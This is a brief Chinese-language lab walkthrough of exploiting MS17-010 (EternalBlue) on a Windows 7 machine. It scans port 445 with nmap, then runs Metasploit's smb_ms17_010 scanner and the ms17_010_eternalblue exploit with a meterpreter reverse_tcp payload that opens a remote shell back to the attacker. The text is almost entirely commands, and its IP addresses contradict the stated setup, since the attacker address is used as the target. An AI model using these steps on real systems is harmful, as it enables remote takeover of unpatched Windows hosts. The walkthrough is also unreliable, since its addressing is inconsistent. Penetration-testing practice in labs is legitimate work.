0x00 环境:
1.攻击机:ubuntu + msf + nmap 192.168.224.129
2.靶 机:win7 64位 192.168.224.134
0x01 确定目标之后,对目标进行端口扫描。
nmap -p445 192.168.224.129 -Pn
0x02 使用msf的ms17-010进行攻击
1.查找ms17-010模块
msf > search ms17-010
2.使用use auxiliary/scanner/smb/smb_ms17_010
进行检测
msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(scanner/smb/smb_ms17_010) > show options
msf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.224.129
msf auxiliary(scanner/smb/smb_ms17_010) > run
3.使用exploit/windows/smb/ms17_010_eternalblue
模块进行攻击(reverse_tcp反向)
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(windows/smb/ms17_010_eternalblue) > show options
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.224.129
msf exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.224.134
msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_eternalblue) > exploit